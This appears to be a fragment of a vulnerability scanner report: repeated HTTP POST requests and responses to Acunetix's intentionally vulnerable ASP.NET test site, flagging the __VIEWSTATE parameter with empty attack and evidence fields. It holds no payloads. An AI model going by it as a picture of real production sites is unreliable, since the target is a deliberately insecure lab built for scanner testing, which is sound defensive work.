Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8215&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAZE9iWdoIZGRkZlRVem08Tkg%2Buf80Z5e8w95qYCo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2BweTKBwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8XE%2BJA3i%2BStgorxBi%2Bq%2FRyayNwWA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:59 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAZE9iWdoIZGRkZlRVem08Tkg+uf80Z5e8w95qYCo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK+weTKBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8XE+JA3i+StgorxBi+q/RyayNwWA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:White" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8214&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDA%2BiSZWNoIZGRkO1qj7DILkXbnhDgg0x2ChIGDVtM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLx57bqBQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8jUpGSzJ2i2%2Fy%2Fkddmcp0KLvTs3g%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:09 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDA+iSZWNoIZGRkO1qj7DILkXbnhDgg0x2ChIGDVtM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLx57bqBQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8jUpGSzJ2i2/y/kddmcp0KLvTs3g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:White" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
